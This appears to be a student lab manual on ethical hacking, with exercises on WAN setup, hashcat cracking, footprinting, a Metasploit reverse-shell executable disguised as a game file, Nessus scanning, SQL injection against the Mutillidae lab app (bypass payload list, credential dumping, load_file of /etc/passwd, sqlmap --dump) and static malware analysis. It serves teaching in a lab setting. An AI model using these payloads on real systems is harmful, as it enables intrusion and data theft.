INDEX

Sl. No Name of Experiment

1 Assessing and securing systems on a Wide Area Network (WAN).

2 Applying encryption and hashing algorithms for secure communications.

3 Data gathering and footprinting on a targeted web site.

4 Using ethical hacking techniques to exploit a vulnerable workstation.

5 Auditing a wireless network and planning for a secure WLAN implementation.

6 Attacking a vulnerable web application and database.

7 Identify and removing malware on a windows system.

8 Analyzing network traffic to create a baseline definition.

9 Securing the network with an Intrusion Detection System (IDS).

 EX NO: 1 Assessing and securing systems on a Wide Area Network (WAN )

Aim :

To study about Assessing and securing systems on a Wide Area Network (WAN )

Procedure :

Step1: we need these devices to set up the network topology as shown in the table below

Step 2: Configuring laptops to make them wireless. First, click on the laptop0 and turn off its power to
change the ports basically we are going to replace the wired port with the wireless port which
is WPC300N.

1
  Replace with WPC300N and make sure to turn it ON.
 Repeat the same procedure with Laptop1 and Laptop 2.
 after that, we will assign IP addresses and a default gatewayto the laptops.

Step 3 : Configure the Router with an IP address and Generate a Securitykey.

 First, click on Router and Go to GUI.

2
 Then click on a setup where you will find the IP address assigned to [Link] and
subnet mask[[Link]].
 Then disable the DHCP server because we have to configure statically.
 Then Save the settings.

 Then move to the wireless option.

 set Network Name(SSID) is HomeNetwork.
 Save the settings.

 Then we set the security key.

 Click on wireless security and select security mode as WEP.
 Then we’ll generate KEY by entering 10 digit Hexa-numeric value. eg: 0123456789.
save the settings.

3
Step 4: Now we will configure the laptops using the IP addressing table given below

Configure Laptop0: To configure the laptop first set the IP configuration as static then add the
IPv4 address and default gateway.

Step 5: Connect the laptop to the router by entering the security key in the laptop.
 Click on laptop0 and go to desktop.
 Click on connect and refresh the network.
 After a few seconds, it will show the name of the network we have assigned.
 Click on HomeNetwork.

4
  Then enter the security key in WEP key 1 and hit on connect.
 laptop0 will connect with the router.

• Repeat the same process with Laptop1 and laptop2 so that they can connect with the router.
• After all of this, all of the hosts will connect with the router

Step 6: Then we’ll verify the wireless connection by pinging the IP address of any laptop or by sending and
receiving data packets. For example: Go to the command prompt of Laptop0 and type the following
command:

command: ping [Link]

5
Result :

Hence the Assessing and securing systems on a Wide Area Network (WAN) was studied successfully.

6
 EX NO: 2 Applying encryption and hashing algorithms for secure communications

AIM :

To study about Applying encryption and hashing algorithms for secure communications.

PROCEDURE :

Hashing is an algorithm that generates a fixed-length string from an input.

There are many different hash algorithms with different properties, for example, SHA-256.

You can use openssl to generate a SHA-256 hash:

echo -n 'secret' | openssl dgst -sha256

The output is the hash:

2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b

Hashes have a special property: they are easy to compute but difficult to reverse: given the hash above, it
difficult to find its origin, “secret”.

This makes hashes a good method to verify passwords: Rather than storing the password itself and risking
it being stolen, you store the password’s hash and when a user provides a password, you compute its hash
and compare it to the stored value, if they match it means that the user entered the correct password.

Cracking a SHA-256 Hash

But hashes can be reversed using methods such as dictionary attacks which compares the given hash to
the hashes of common words from a dictionary or brute-force which computes the hash of many different

7
combinations of characters until it finds one that matches the given hash. This is, of course, not very efficient,
but, with enough compute power and time, it often works.

Let’s see an example:

Suppose you were given the hash above and you want to find its origin. To do that, you can utilize a tool
called hashcat.

First you need to install it. I used the following steps to install it on macOS Catalina
(requires git and make which you can get with brew):

git clone [Link]

mkdir -p hashcat/deps
git clone [Link] hashcat/deps/OpenCL
cd hashcat/ && make install

Next you need to find the identifier (Hash mode or Hash-type) of your hash algorithm. For SHA-256 it’s
1400. You can see all codes on this page (or with hashcat --help).

Now run a brute-force attack:

hashcat -m 1400 -a 3 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b

And after a short while, you should get:

2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b:secretSession.........hashcat
Status...........Cracked
[Link]......: SHA2-256
[Link]......: 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25 .. 27a25b
[Link]...: Tue Sep 22 [Link] 2020 (10 secs)
[Link] .: Tue Sep 22 [Link] 2020 (0 secs)
[Link].......?1?2?2?2?2?2 [6]
[Link]. .: -1 ?l?d?u, -2 ?l?d, -3 ?l?d*!$@_, -4
Undefined [Link] 6/15 (40.00%)
Speed.#1.........: 55535.2 kH/s (6.90ms) @ Accel:256 Loops:128 Thr:1 Vec:4

8
 Recovered........1/1 (100.00%) Digests
Progress.........521502720/3748902912 (13.91%)
Rejected.........0/521502720 (0.00%)
[Link]....233472/1679616 (13.90%)
[Link].#1...: Salt:0 Amplifier:0-128 Iteration:0-128
Candidates.#1....: sacers->co9ishStarted: TueSep[Link]
Stopped: Tue Sep 22 [Link] 2020

You can see that the status is “Cracked” and the original “secret” just above that.

Cracking an HMAC SHA-256 Hash

Let’s try a slightly more advanced example. This time we will use a different hash algorithm called
HMAC- SHA-256 which requires not only the input string but also anothersecret key.

First, let’s generate the hash of ‘Lucy in the sky of diamonds’ with a secret key ‘secret’:
echo -n 'Lucy in the sky of diamonds' | openssl dgst -sha256 -hmac 'secret'

This will generate the hash:

116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5

Now let’s try to reverse it. The Hash mode of HMAC-SHA-256 is 1450. We pass a string comprising the
hash and the original text separated by a colon:

hashcat -m 1450 -a 3 "116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5:Lucy in the

sky of diamonds"

After a minute or so, you should get the result which is the secret key “secret”:

116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5:Lucy in the sky

of diamonds:secretSession.....hashcat
Status...........Cracked
[Link]........HMAC-SHA256 (key =$pass)
[Link]......: 116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443....amonds
[Link]...: Tue Sep 22 [Link] 2020 (41 secs)
[Link] .: Tue Sep 22 [Link] 2020 (0 secs)

A few more advanced tricks with hashcat

9
1. You can crack multiple hashes by putting them in a file and running:
hashcat -m 1450 -a [Link]

Each line in the file should be in the form of “hash” for SHA-256 or “hash:original text” for HMAC-
SHA- 256.

2. You can use custom character sets and patterns, for example this command searches for secrets with

six lowercase letters only:

hashcat -m 1450 -a 3 -1 abcdefghijklmnopqrstuvwxyz

"116fb393a265d0eb638a6070e5b051a2987e33195eef0e13443f9d8d3e5668b5:Lucy in the sky of diamonds" "?1?1?
1?1?1?1"

3. After successfully cracking a hash, hashcat stores it in ~/.hashcat/[Link]. If you want to run
the same crack again, you need to remove the result from this file, otherwise hashcat will simply return
the cached result.

RESULT :

Thus , Applying encryption and hashing algorithms for secure communications. Has been
studied successfully.

10
EX NO: 3 Data gathering and footprinting on a targeted web site

AIM:

To study about Data gathering and footprinting on a targeted web site.

PROCEDURE;

What type of information to collect

Generally, there are 3 types of information that can be identified by information gathering.

 Network Information: such as domain name, IP addresses, websites, protocols

used, VPNs, authentication mechanisms, and list of network systems.
 System Information: such as users, system banners, SNMP information,
system architecture, operating systems, username, and passwords.
 Organizations’ Information: such as employee details, organization’s website,
local details, address and phone numbers, security policies implemented, social
media posts, news articles, and press releases.

Information gathering sources

The goal of information gathering is to collect as much information as possible about the
target. So any source that can give us information about the target is valuable.

Some common sources for the information gathering are as follows:

 DNS
 Whois
 IP and Ports
 Social media
 Address books and offline sources
 Website

Let’s see what kind of information we can get from each source.

DNS interrogation
Security testing starts with one or more targets. By targets, we mean domain names or IP
addresses. The place to find out more about domains and IPs are Domain Name Servers
(DNS). We can find IP addresses corresponding to a domain name and vise versa using DNS
footprinting (aka DNS interrogation). Another best place to find out subdomains of a domain
is Google search.

Tools for DNS interrogation: NSlookup, Dns enumerator, Sam Spade

Whois

11
Who is the owner of a domain or IP address? WHOIS is a query and response protocol to
answer this question. You can search any domain or IP in public databases to get
information like the expiration date, current registrar, registrant information, etc.

Tools: Google for “Whois”

IP and Ports
After collecting IP addresses we should look for open ports and running services. Using
tools like Ping, Telnet, Nmap, and other tools you can determine live IPs and running
services.

⛔ WARNING: IP and Port scanning is an active footprinting technique and performing it

unauthorized, is illegal in some countries.
Once you’ve found an open port you can do Banner grabbing to learn more about the
running service behind the port. Many services send information like the service version
and OS name in their responses. This information is known as banner and fetching this info
is called Banner Grabbing.

For example, in the below example, you can see that an HTTP request has been sent to
target and the server response contains the webserver name and underlying operating
system.

$ nc target 80

HEAD / HTTP/1.1

HTTP/1.1 400 Bad Request

Date: Sun, 27 Jun 2021 [Link] GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 306

Connection: close

Content-Type: text/html; charset=iso-8859-1

Tools for IP and port scanning: Ping, Telnet, NetCat, Nmap, SuperScan

Social Media
Social media sites are growing more than ever and now it’s part of our day-to-day life.
People sometimes share detailed information on public pages without knowing that this
information can be abused by malicious users. Places like Facebook, Instagram, LinkedIn,
and other social media sites are good places where valuable information is shared by users.

Address Books and Offline Sources

12
Looking into address books and trash bins or asking from people are a few of the
oldest information gathering methods.

In the IT world dumpster diving refers to retrieving information from disposed items
that could be used to carry out an attack or gain access to a computer network.

Website Information Gathering

Websites can reveal important information like server technologies, CMS, backend
database, email addresses, and much more.

You can read our previous post to learn more about passive information gathering method

Generally speaking, active scanning methods which can be used for information
gathering are Fuzzing, testing for misconfigurations, and testing for known
vulnerabilities.

Fuzzing refers to manipulating and sending crafted requests to the webserver to trick it into
yielding information. Sometimes trying different inputs which are not expected by the web
application can make the web application throw a detailed error message. Such error
messages can reveal OS, server-side technologies, databases, or many other things. Also, the
behavior of the webserver (the way it responds to the request) can reveal information like
the webserver type.

Testing for misconfigurations: Using default or insecure configurations are common

mistakes that leave valuable information unprotected. For example, a bad
configured Apache webserver can show a huge amount of information on /server-info
URL. Misconfigurations can be found anywhere. Another example is having a public
community string for an SNMP service which can disclose a tremendous amount of
information regarding the service.

Testing for know vulnerabilities: You may have heard of the heartbleed bug which allows
anyone on the Internet to read the memory of the systems protected by the vulnerable
versions of the OpenSSL software. Using similar bugs and vulnerabilities is another
method for collecting target information.

What to do with Collected Information

The next steps after information gathering are scanning and gaining access to the target.
Sometimes (if you’re lucky) you can find information like passwords that allow direct access
to the systems but most of the time you can only find the type of OS, web server, or
database.

How to Protect Against Information Gathering

You should try to eliminate the disclosure of sensitive information. Below are some best
practices you can use to achieve it.

1. Classify the type of information which can be kept public.

2. Don’t publish unnecessary information in any profile, social networking account,
or website.

13
3. Keep internal DNS and external DNS separate.
4. Restrict and disable DNS zone transfer to authorized servers.
5. Establish a disposal policy where all papers are shredded before being recycled
6. Educate your employees to prevent unwanted information disclosure
7. Audit and scan your website and network for any information leakage
8. Keep your systems updated

14
RESULT :

Hence , the Data gathering and footprinting on a targeted web site was studied
successfully.

15
EX NO: 4
Ethical hacking techniques to exploit a vulnerable workstation.

AIM :
To study about Using ethical hacking techniques to exploit a vulnerable workstation.

PROCEDURE :

( Create Metasploit )

Before creating the metasploit, we need to figure out what is our Kali Linux local IP.

For that, run ```ip addr``` or ```ifconfig```

Get the IPv4 Local IP

Now let’s get hands dirty!

16
In the terminal run the follow command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.

The command above instructs msfvenom to generate a 32-bit Windows executable file that
implements a reverse TCP connection for the payload. The format must be specified as being
type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our
case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last
command, and the LPORT is the port to listen on for a connection from the target once it has
been compromised.

The name of the .exe is up to you. In this case I’ll be using [Link] because
our target will be a gamer that we know has GTA V.

Connection

We now need to set up a listener on the port we determined within the executable. We do
this by launching Metasploit using the command msfconsole on the Kali Linux terminal.

17
The screenshot below shows what commands to issue within Metasploit. First, we’ll tell
Metasploit to use the generic payload handler “multi/handler” using the command ```use
multi/handler```. We will then set the payload to match the one set within the executable
using the command ```set payload windows/meterpreter/reverse_tcp```. We will then
set the LHOST and LPORT this way — ```set LHOST [Link]``` and set
```LPORT 4444```. Once done, type ```run``` or ```exploit```and press [Link]
screenshot below displays the output. The reverse TCP handler should begin waiting for a
connection.

18
19
You can use show options to check if everything’s ok

If everything’s ok type run or exploit

Social Engineer

Now it’s the part that you need to do some social engineer in order to make the user
execute the program.

For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows
Machine.

20
On the Windows machine you just need to access via the browser the IP/[Link]

In our case is [Link]/[Link]

Now execute and check the connection on the Kali Machine.

As you can see we are now connected to the victim machine.

Now we can do a lot of things.

21
22
Create metasploit

Before creating the metasploit, we need to figure out what is our Kali Linux local IP.

For that, run ```ip addr``` or ```ifconfig```

23
Get the IPv4 Local IP

Now let’s get hands dirty!

In the terminal run the follow command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe

LHOST=[Link] LPORT=4444 -o /root/Desktop/[Link]

The command above instructs msfvenom to generate a 32-bit Windows executable file that
implements a reverse TCP connection for the payload. The format must be specified as being
type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our
case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last
command, and the LPORT is the port to listen on for a connection from the target once it has
been compromised.

The name of the .exe is up to you. In this case I’ll be using [Link] because our
target will be a gamer that we know has GTA V.
Connection

We now need to set up a listener on the port we determined within the executable. We do
this by launching Metasploit using the command msfconsole on the Kali Linux terminal.

24
The screenshot below shows what commands to issue within Metasploit. First, we’ll tell
Metasploit to use the generic payload handler “multi/handler” using the command ```use
multi/handler```. We will then set the payload to match the one set within the executable
using the command ```set payload windows/meterpreter/reverse_tcp```. We will then
set the LHOST and LPORT this way — ```set LHOST [Link]``` and set
```LPORT 4444```. Once done, type ```run``` or ```exploit```and press Enter.

The screenshot below displays the output. The reverse TCP handler should begin waiting for
a connection.

You can use show options to check if everything’s ok

25
If everything’s ok type run or exploit

Social Engineer

Now it’s the part that you need to do some social engineer in order to make the user execute
the program.

For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows
Machine.

26
On the Windows machine you just need to access via the browser the IP/[Link]

In our case is [Link]/[Link]

Now execute and check the connection on the Kali Machine.

As you can see we are now connected to the victim machine.

Now we can do a lot of things.

RESULT :

Thus, Using ethical hacking techniques to exploit a vulnerable workstation was successfully

27
studied

28
EX NO: 5
Auditing a wireless network and planning for a secure WLAN implementation

AIM :

To study about Auditing a wireless network and planning for a secure WLAN
implementation.

PROCEDURE :

TOOL TO AUDITING – NESSEUS

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network. It does this by running over 1200 checks on a
given computer, testing to see if any of these attacks could be used to break into the
computer or otherwise harm it.

Installation and setting up:

I generally use terminal, so I will setup Nessus in Kali Linux through terminal, you can use
GUI version of Nessus in Windows.

To show active Internet connections:

netstat -nltup

The Nessus local address is highlighted i.e., 8834

If you didn’t find the Nessus port restart system control by following command:

/ Sysyemctl restart [Link]

29
Open new terminal and find your ip address:

$ ifconfig for linux.

$ ipconfig for windows.

Now you need to paste this local address of Nessus followed by your ip address and paste in
your browser where you can scan vulnerabilities.

For example: Your ip address is [Link] and Nessus address is 8834.

[Link] , This will be your link for Nessus.

After opening the link, you will see Nessus interface as shown below,

Nessus user interface, click on Nessus Essentials.

Here you see 16 different vulnerability scans. I had done basic scans i.e, network scan.
You can explore all the different scans in a similar way.

I will be using [Link] which is free for vulnerability tests. You can also host
a domain on your own using metasploit.

Open Network scan and ENTER the ip address which you want to scan. There are
many other advanced options where it is not preferable for newbies. If you are interested
you can can have a look and proceed.

30
Click on new scan:

Launch your scan.

You will get the similar output as the below image. Download your scan report in .pdf file.

Result:

Hence , Auditing a wireless network and planning for a secure WLAN implementation.

31
 EX NO: 6
Exploiting SQL injection vulnerabilities
DATE:
Aim:

To study about Exploiting SQL injection vulnerabilities

Procedure:

SQL Injection is a sort of infusion assault that makes it conceivable to execute malicious SQL
statements. These statements control a database server behind a web application. Assailants can utilize
SQL Injection vulnerabilities to sidestep application safety efforts. They can circumvent
authentication and authorization of a page or web application and recover the content of the whole
SQL database. They can likewise utilize SQL Injection to include, change, and erase records in the
database. SQL Injection vulnerability may influence any site or web application that uses the SQL
database, for example, MySQL, Oracle, SQL Server, or others.

Offenders may utilize it to increase unapproved access to your sensitive information, client data, trade
secrets, licensed innovation, and that’s only the tip of the iceberg. SQL Injection assaults are one of
the most seasoned, most pervasive, and most dangerous web application vulnerabilities.

Since this topic is so vast, we will not be able to mention all the nitty-gritty stuff of SQL injection but
will explain some of them starting with the basics. For this purpose, we will use metasploitable’s
Mutillidae web application, which is vulnerable to SQL Injection attacks for demonstration purposes
only.

32
Select the ―Mutillidae‖ link and go to the ―Login/Register‖ tab and registerto create an account.

Provide necessary information and click on the ―Create Account‖ button.

Now let’s use some SQL injection techniques to bypass the login page. Login bypass is,
undoubtedly, one of the most popular SQL injection [Link] tutorial presents different
ways an attacker can use to defeat a login form.

Discovering SQL injections in the POST field

The login structure we will use in our examples is straightforward. It contains two input fields
(username and password), which are both vulnerable. The back-end content creates a query to approve
the usernameand secret key given by the client. Here is an outline of the page rationale:

($query= ―SELECT * FROM users WHERE username=‘$_POST[username]‘ AND

password=‘$_POST[password]‘―;).

33
To sidestep login and access restricted areas, the attacker needs to build anSQL section that will

change

the ―WHERE‖ clause and make it true. For instance, the accompanying login data would give access
to the aggressor by abusing the weakness present in the password parameter. For the username put
―[Link]‖ or ―anything‖ and for the password put (anything‘ or‗1‘=‘1) or (admin‘ or ‗1‘=‘1) then try to
log in, and you’ll be presented with an admin login page.

34
Let’s take a look at the generated query for a moment: (SELECT * FROM users WHERE
username=‘[Link]‘ AND password=‘anything‘ OR ‗1‘=‘1').Due to operator priority, the ―AND‖
condition is assessed first.

Then the ―OR‖ operator is evaluated, making the ―WHERE‖ statement true. The condition will be
valid for all lines of the ―users‖ table. It implies that the given username is disregarded, and the
aggressor will be signed in as the primary user in the ―users‖ table. It additionally means that the
aggressor does not need to know a username to access the framework; the query will discover one for
him!

In these straightforward examples, we have seen that an aggressor can sidestep an authentication
system with SQL infusion. Without limiting the disastrous consequences this might have, it is
essential to mention that a SQL injection can have a much more significant security impact than a
login by pass. Below is a list of commands created by OWASP board member [Link] Islam Tatlilf
that can be used in the SQL injection authentication by pass.

or 1=1
or 1=1--
or 1=1#

or 1=1/* admin‘--
admin‘ # admin‘/*
admin‘ or
‗1‘=‘1
admin‘ or ‗1‘=‘1'--
admin‘ or ‗1‘=‘1'#
admin‘ or‗1‘=‘1'/*
admin‘or 1=1 or
‗‘=‘admin‘ or 1=1
dmin‘ or 1=1--
admin‘ or 1=1#
admin‘ or 1=1/*
admin‘) or (‗1‘=‘1
admin‘) or (‗1‘=‘1'--
admin‘) or (‗1‘=‘1'#

35
admin‘) or (‗1‘=‘1'/*
admin‘) or ‗1‘=‘1
admin‘) or ‗1‘=‘1'--
admin‘) or ‗1‘=‘1'#
admin‘) or‗1‘=‘1'/*
1234 ‗ AND 1=0 UNION ALL SELECT ‗admin‘,
‗81dc9bdb52d04dc20036dbd8313ed055 admin‖--
admin‖ # admin‖/*
admin‖ or ―1‖=―1
admin‖ or ―1‖=―1‖--
admin‖ or ―1‖=―1‖#
admin‖ or ―1‖=―1‖/*
admin‖ or 1=1 or
――=―admin‖ or 1=1
admin‖ or 1=1--
admin‖ or 1=1#

admin‖ or 1=1/*
admin‖) or (―1‖=―1
admin‖) or (―1‖=―1‖--

admin‖) or (―1‖=―1‖#
admin‖) or (―1‖=―1‖/*
admin‖) or ―1‖=―1
admin‖) or ―1‖=―1‖--
admin‖) or ―1‖=―1‖#
admin‖) or ―1‖=―1‖/*
1234 ― AND 1=0 UNION ALL SELECT ―admin‖,
―81dc9bdb52d04dc20036dbd8313ed055

36
 Bypassing login field

In this example, we’ll target only the username field and try to get access. The username field is
vulnerable as well, and it can likewise be misused to access the framework. It would be less
demanding and progressively commonsense for the attacker to bypass authentication since he could
pick which user’s record he might want to sign into.

Here is what the SQL injection assault will look like. Put (admin‘ #) or (admin‘--) in the username field
and hit ―Enter‖ to log in. We use ―#‖ or ―--‖ to comment everything in the query sentence that comes
after the username filed telling the database to disregard the password field: (SELECT * FROM users
WHERE username=‘admin‘ # AND password=‘ ‗). By using line commenting, the aggressor eliminates a
part of the login condition and gains access.
This technique will make the ―WHERE‖ clause true only for one user; in this case, it is ―admin.‖

37
Union-based SQL injection

UNION-based SQL injection assaults enable the analyzer to extract data from the database effectively.
Since the ―UNION‖ operator must be utilized if the two inquiries have precisely the same structure,
the attacker must craft a ―SELECT‖ statement like the first inquiry. To do this, a substantial table
name must be known, yet it is likewise vital to decide the number of columns in the first inquiry and
their information type.

In this tutorial, we will be using the ―User Info‖ page from Mutillidae to perform a Union-Based SQL
injection attack. Go to ―OWASP Top 10/A1 — Injection/SQLi — Extract-Data/User Info‖ and use a
login bypass technique learned previous lecture to access the page.

From this point, all our attack vectors will be performed in the URL section of the page using the
Union-Based technique.

There are two different ways to discover how many columns are selected by the original query. The
first is to infuse an ―ORDER BY‖ statement indicating a column number. Given the column number
specified is higher than the number of columns in the ―SELECT‖ statement, an error will be returned.
Otherwise, the results will be sorted by the column mentioned.

38
39
Since we do not know the number of columns, we start at 1. To find the exact amount of columns the number
is incremented until an error related to the ―ORDER BY‖ clause is returned.
In this example, we incremented it to 6and received an error message, so it means that the number of
columns is lower than 6.

When we ordered by 5, it worked and displayed some information. It means there are five columns
that we can work [Link], instead of using the ―order by‖ option, let’s use the ―union select‖
option and provide all five columns.

Ex (union select 1,2,3,4,5).

40
As it is shown in the screenshot columns 2, 3, and 4 are usable, so we can substitute those numbers
with any database values to see what they correspond to. Let’s change column 2 to ―database(),‖
column 3to ―user(),‖ and column 4 to ―version().‖

Ex: (union select 1,database(),user(),version(),5).

41
This Union command provided us some useful information; now, we know that the database is
―owasp10,‖ which has a user ―root@localhost,‖ and the version of the server is ―5.0.51a-3ubuntu5‖.
Based on this information, we can search for some vulnerabilities or attack vectors to compromise
our target further.

Finding Database Tables

Before building a query to extricate sensitive data, the assailant must recognize what information he
needs to remove and where it is stored in the database. First and foremost, you have to realize that you
might most likely view tables that your database user has access to. In other words, you might most
likely rundown tables that your session client either claims or on which the client has been allowed
some authorization. Every other table will appear to be inexistent.
In MySQL, the table ―information_schema.tables‖ contains all the metadata identified with table items.
Below is listed the most useful information on this table.
―table_name‖: The name of the table.

―table_schema‖: The outline in which the table was made.

If you want to limit the list of tables returned to the current schema, you canadd a
―WHERE‖ clause to filter this column in combination with
―DATABASE()‖ and ―SCHEMA()‖ functions.

Ex: (union select 1,table_name,null,null,5 from information_schema.tables where

table_schema =‗owasp10‘).

Here we want to retrieve table names from the ―owasp 10‖ database.

42
 As you can see, we have access to multiple tables named ―accounts,‖―blogs_table,‖ ―captured_data,‖
credit_cards,‖―hitlog,‖ and ―pen_test_tools.‖

Extracting sensitive data such as passwords

When the attacker knows table names, he needs to discover what the column names are to extract data. In
MySQL, the table ―information_schema.columns‖ gives data about columns in [Link] of the most
useful columns to extract is called ―column_name.‖

Ex: (union select 1,colunm_name,null,null,5 from information_schema.columns where table_name =

‗accounts‘).

Here we are trying to extract column names from the ―accounts‖ table.

43
Once we discovered all available column names, we can extract information from them by just adding
those column names in our query sentence.
Ex: (union select 1,username,password,is_admin,5 from accounts).

As it is shown in the screenshot, we managed to retrieve all usernames and passwords related to this database.

Reading and writing files on the web-server

In this instructional exercise, I will tell you the best way to access documents on the target machine,
just as how to transfer your very own files and code onto the objective computer, all without ever
stepping foot into the administration panel of the target website.

We can use the ―LOAD_FILE()‖ operator to peruse the contents of any file contained within the web-server.
We will typically check for the ―/etc/password‖ file to see if we get lucky and scoop usernames and
passwords to possible use in brute force attacks later.

44
Ex: (union select null,load_file(‗/etc/passwd‘),null,null,null).

Now we will utilize the ―INTO_OUTFILE()‖ operator for all that they offer and attempt to root the
objective server by transferring a shell-code through SQL infusion. Remember, the general purpose of
this is to tell you the best way to do it without getting caught by the administrator panel. This
alternative enables you to take the contents from a column and spot them ina decent text file for
neatness purposes. You can also utilize it to transfer a PHP shell-code to perform a remote file
inclusion or CMD execution.

Ex: (union select null,‘Hello World!‘,null,null,null into outfile‗/tmp/[Link]‘).

In this example, we will write a ―Hello World!‖ sentence and output it in the
―/tmp/‖ directory as a ―[Link]‖ file. This ―Hello World!‖ sentence canbe substituted with any PHP
shell-code that you want to execute in the target server.

45
As it’s shown in the image, we successfully added our text and saved it in the ―/tmp‖
directory as a ―[Link]‖ file.
Discovering SQL injections and extracting data using SQLmap

Sqlmap is a standout amongst the most mainstream and ground-breaking SQL injection automation
tools out there. Given a vulnerable HTTP requestfor URL, sqlmap can abuse the remote database and
complete a ton of hacking like removing database names, tables, columns, all the data in the tables,
and so on. It can even read and write documents on the remote file system under specific conditions.

Utilizing sqlmap can be tricky when you are inexperienced with it. This sqlmap instructional exercise
aims to display the most vital functionalities ofthis mainstream SQL infusion apparatus in a snappy and
fundamental way.
To start sqlmap and list all available options, type ―sqlmap --help.‖ It will provide everything you
need to know and some examples of how to use it inpractice. Let’s take a look at this tool much closer.

46
Then copy the URL link and use it in the sqlmap tool.

Ex: (sqlmap –u [Link]

[Link]&username=test&password=test&user-info-php-submit-
button=View+Account+Details).

Here ―-u‖ stands for the target URL that you want to perform an SQLinjection attack.

To skip test payloads specific for other DBMSes, answer ―Y‖ to the question.

Within a few minutes of search, sql map has already found that the user name is injectable and
vulnerable, as shown in the screenshot.

47
If you want to find more vulnerabilities, just let the process run until the end, and it can find all available
vulnerabilities. For this particular lecture, we‘ll stop here by pressing ―Crtl+C.‖

Things get truly fascinating in this sqlmap tutorial with regards to extracting data. It is a meticulous task
to recover information stored in the database from a SQL injection point, particularly when no outcome is
returned directly to the vulnerable webpage. Luckily, sqlmap enables the analyzer to extricate valuable
snippets of data without the hassle of manual techniques. First, let’s extract all available databases on the
website we are trying to hack using a similar command, but at the end, adding the―--dbs‖ option for the
database.

Ex:(sqlmap–u[Link]

& username=test&password=test&user-info-php-submit button=View+Account+Details --dbs).

Sqlmap extracted all available databases. To inject more SQL queries, we need to know our current
database by using the same command but replacing the last parameter with ―--current-db.‖

Ex: (sqlmap –u [Link]

[Link]&username=test&password=test&user-info-php-submit-
button=View+Account+Details --current-db).

The output of this command shows that we are in the ―owasp10‖ database.

48
Now let’s see all available tables for the database ―owasp10‖ using the command ―-
-tables –D owasp10‖.

Ex: (sqlmap –u [Link]

[Link]&username=test&password=test&user-info-php-submit-
button=View+Account+Details --tables –D owasp10).

As it is shown in the screenshot, we managed to extract all available tables for the database
―owasp10‖.

Sqlmap can also enumerate columns by implementing parameters ―--columns -T [table_name].‖

Ex: (sqlmap –u [Link]

[Link]&username=test&password=test&user-info-php-submit-
button=View+Account+Details --columns -T accounts

49
 It is even possible for the hacker to dump entire tables or databases and list all valuable information
using the option ―--dump.‖
Ex: (sqlmap –u [Link]
[Link]&username=test&password=test&user-info-php-submit-
button=View+Account+Details — columns -T accounts --dump).

Note:

1. Sometimes sqlmap is unable to connect to the URL at all. It is possible when it gets stuck at the
first task of ―testing connection to the target url.‖ Insuch cases, it is helpful to use the ―--random-
agent‖ option. It makes sqlmapuse a valid user agent signature like the ones sent by a browser like
Chrome or Firefox.

2. For URLs that are not in the form of ―parameter=value,‖ sqlmap can’t naturally realize
where to infuse. For instance, URLs
like ―[Link] In such cases,sqlmap should be told the
infusion point set apart by a ―*.‖

Ex: ([Link]

The above will advise sqlmap to infuse at the point set apart by ―*.‖

Result:

Hence the Exploiting SQL injection vulnerabilities are studied successfully.

50
 EX NO: 7 Malware Analysis Techniques – Basic Static Analysis

Aim:

To study about Malware Analysis Techniques – Basic staticAnalysis.

Procedure:

What Is Basic Static Analysis

Basic Static Analysis consists of analyzing a file without ever executingit. It works by extracting all the

possible static information inside of thefile such as the hash, strings, libraries, imported functions,

resources…etc. To get a basic understanding of the functionalities andthe behavior of the malware before

its execution.

Fingerprinting the Malware

One of the easiest static information that we can extract is the hash value. Which can be used to identify the
malware sample. We’ll look at how can we obtain this value using two different methods.

Using Powershell

If powershell is available on the machine, we can obtain the hash valueby simply running the “Get-
FileHash”command like this.

Get-FileHash <path_to_file> -Algorithm <hash_algorithm> | Format-

List

Using Freely Available Tools

There exists multiple tools that can hash files for us, I’d like to use nirsoft’s “HashMyFiles”.
You can download it here. Below is how the results should look like after executing it.

51
Searching for Interesting Strings

Any file that uses hard-coded data such as URL’s, file paths, and messages…etc. Contain strings
inside of it. Those strings can provide very useful information about what the malware can do.
[Link]<path_to_the_file>| findstr/i<text_to_search_for>

Sifting through all the output of strings can sometimes be tedious. What I like to do is using
strings in tandem with regular expressionspecifically tailored for my need.

For example if I’m searching for IP’s or domain’s, I’ll pipe the result of the strings command to a
regex to filter out the results.

[Link] <path_to_the_file> | findstr /r <regex_for_URL>

nspecting the PE File Format

Most of the malware that targets windows machines comes in the formof PE files. The PE
file format is a format used by windows for executables, DLL’s and code objects.

We will not be discussing the PE format in this article, as it deserves anarticle on its own. In the
meantime, that are many great resources online that you can check to start learning.

I recommend the Microsoft documentation starting with “Pe Format” and “peering inside the
pe format” and also as a great visualrepresentation of the PE format check [Link]

52
53
Listing the DLL’s and Imported Functions

One of the most important if not the most important pieces of information besides strings that
we can extract statically from our malware, are loaded libraries and imported functions. From
these imported functions and libraries, we can guess the functionalities of the malware.

To use it just open it, drag, and drop the file. The results should look something like this.

To Pack or Not Pack

Using tools like PEiD or Exeinfo PE, can help us identify if the malware is packed with known
packers or not (Check out this twitterthered for more on this topic).

54
Another technique is to look at the Imports Table and check the number of imports. A small
number often indicates that the malware is packed.

Dig For Resources

As we’ve mentioned before, the PE file format contains headers and sections. One of the
interesting sections to look at is the .rsrc section orthe resource section. It’s a section where things
like images, icons, and language strings are stored.
To view the resource section and start looking for any “suspicious” or “malicious” signes we can
use Angus Johnson’s “Resource Hacker”

55
Result:
